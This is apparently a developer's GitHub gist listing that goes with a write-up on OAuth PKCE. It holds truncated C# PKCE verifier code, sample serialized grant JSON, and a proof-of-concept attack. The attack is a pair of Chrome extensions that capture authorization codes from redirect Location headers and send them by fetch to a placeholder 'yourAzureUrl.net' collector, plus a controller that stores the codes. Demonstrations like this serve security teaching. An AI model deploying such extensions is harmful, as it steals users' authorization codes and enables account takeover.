
David Klempfner DavidKlempfner

DavidKlempfner / ValidateCodeVerifierAgainstCodeChallenge.cs
Created February 12, 2024 10:15
ValidateCodeVerifierAgainstCodeChallenge
/// <summary>
/// Checks a PKCE code verifier against a code challenge for the given challenge method.
/// Only the start of the method is shown in this listing; the final comparison for the
/// non-plain path is not visible here.
/// </summary>
/// <param name="codeVerifier">The PKCE code_verifier to check.</param>
/// <param name="codeChallenge">Value the verifier is compared against. The plain branch compares it
/// with <c>codeVerifier.Sha256()</c>, so it is presumably held in hashed form rather than as the raw
/// challenge (confirm against the code that stores it).</param>
/// <param name="codeChallengeMethod">Challenge method; only <c>Plain</c> is tested explicitly, every
/// other value takes the hash-and-encode path below.</param>
/// <returns>For <c>Plain</c>, the result of <c>TimeConstantComparer.IsEqual</c>.</returns>
private bool ValidateCodeVerifierAgainstCodeChallenge(string codeVerifier, string codeChallenge, string codeChallengeMethod)
{
if (codeChallengeMethod == OidcConstants.CodeChallengeMethods.Plain)
{
// Plain method: the verifier gets no PKCE transform, only the Sha256() applied on this line.
// TimeConstantComparer is, by its name, a constant-time comparison, so a mismatch should not
// reveal through timing how much of the value matched (verify the helper).
return TimeConstantComparer.IsEqual(codeVerifier.Sha256(), codeChallenge);
}
// NOTE(review): there is no explicit check for the S256 method name; any value other than Plain
// reaches this point, so the method is assumed to have been validated by the caller.
// Encoding.ASCII replaces every non-ASCII character with '?', so verifiers that differ only in
// such characters produce the same bytes. RFC 7636 limits the verifier to 43-128 unreserved ASCII
// characters; that validation is not visible here and should happen before this call.
var codeVerifierBytes = Encoding.ASCII.GetBytes(codeVerifier);
// S256 transform from RFC 7636: BASE64URL-ENCODE(SHA256(ASCII(code_verifier))).
var hashedBytes = codeVerifierBytes.Sha256();
var transformedCodeVerifier = Base64Url.Encode(hashedBytes);
DavidKlempfner / SerializedInRedis.json
Created February 11, 2024 04:11
SerializedInRedis
{
"PersistentGrantDataContainerVersion": 1,
"DataProtected": true,
"Payload": "CfDJ8P_eUI7fv4VJqaZguyuE..."
}
DavidKlempfner / SerializedAuthorizationCode.json
Created February 11, 2024 04:08
SerializedAuthorizationCode
{
"CreationTime": "2024–02–11T03:42:43Z",
"Lifetime": 3000,
"ClientId": "p-web",
"Subject": {
"AuthenticationType": "Identity.Application",
"Claims": [
{
"Type": "sub",
"Value": "2188df58–6343–4897–8f43–3afb325a924e"
DavidKlempfner / AttackersChromeExtensionManifest.json
Created January 6, 2024 04:55
AttackersChromeExtensionManifest
{
"manifest_version": 3,
"name": "Attacker's Chrome Extension",
"description": "Updates the request with the authorization code from the victim",
"version": "1.0",
"background": {
"service_worker": "background.js"
},
"host_permissions": [
"<all_urls>"
DavidKlempfner / AttackersChromeExtension.js
Created January 6, 2024 04:53
AttackersChromeExtension
const callback = function(details) {
if (details.statusCode === 302) {
const locationHeader = details.responseHeaders.find(x => x.name.toUpperCase() === 'LOCATION');
const callbackPath = '/authentication/callback?code='; // Update this with whatever path your browser uses to send the authorization code to the client app
if (locationHeader && locationHeader.value.includes(callbackPath)) {
const authCode = locationHeader.value.split('=')[1].split('&')[0];
// Attacker code:
fetch('https://yourAzureUrl.net/AuthCodePersistor').then(r => r.text()).then(result => {
const newUrl = locationHeader.value.replace(authCode, result);
DavidKlempfner / MaliciousChromeExtensionManifest.json
Created January 6, 2024 04:48
MaliciousChromeExtensionManifest
{
"manifest_version": 3,
"name": "Victims Extension",
"description": "Allows an attacker to intercept the authorization code",
"version": "1.0",
"background": {
"service_worker": "background.js"
},
"host_permissions": [
"<all_urls>"
DavidKlempfner / MaliciousChromeExtension.js
Created January 6, 2024 04:45
Malicious Chrome Extension
const callback = function(details) {
if (details.statusCode === 302) {
const locationHeader = details.responseHeaders.find(x => x.name.toUpperCase() === 'LOCATION');
const callbackPath = '/authentication/callback?code='; // Update this with whatever path your browser uses to send the authorization code to the client app
if (locationHeader && locationHeader.value.includes(callbackPath)) {
const authCode = locationHeader.value.split('=')[1].split('&')[0];
// Victim code:
fetch('https://yourAzureUrl.net/AuthCodePersistor/' + authCode).then(r => r.text()).then(result => {
});
chrome.tabs.update(details.tabId, {url: '<URL to send the victim to after the attack'});
DavidKlempfner / AuthCodePersistor.cs
Created January 6, 2024 02:41
AuthCodePersistor
namespace AuthCodePersistor.Controllers
{
[ApiController]
[Route("[controller]")]
public class AuthCodePersistor : ControllerBase
{
private static string AuthCode = "";
[HttpGet]
[Route("{authCode}")]
message.State = Options.StateDataFormat.Protect(properties);
DavidKlempfner / PkceGeneration.cs
Last active December 4, 2023 11:33
PkceGeneration
/// <summary>
/// Handles the outgoing challenge; the visible part generates the PKCE code verifier.
/// Only a fragment of the method is shown in this listing.
/// </summary>
/// <param name="properties">Authentication properties for the challenge.</param>
private async Task HandleChallengeAsyncInternal(AuthenticationProperties properties)
{
// code omitted
// PKCE material is generated only when PKCE is enabled in the options and the response type is
// Code; with any other response type this branch is skipped and no verifier is created.
if (Options.UsePkce && Options.ResponseType == OpenIdConnectResponseType.Code)
{
// 32 bytes = 256 bits of verifier entropy.
var bytes = new byte[32];
// RandomNumberGenerator is the cryptographic RNG. The verifier has to be unpredictable:
// it is the secret that binds the later code redemption to this challenge.
RandomNumberGenerator.Fill(bytes);
// Base64url without padding turns 32 bytes into 43 characters, the minimum verifier length
// allowed by RFC 7636, using only characters the RFC permits.
var codeVerifier = Base64UrlTextEncoder.Encode(bytes);
// Store this for use during the code redemption. See RunAuthorizationCodeReceivedEventAsync.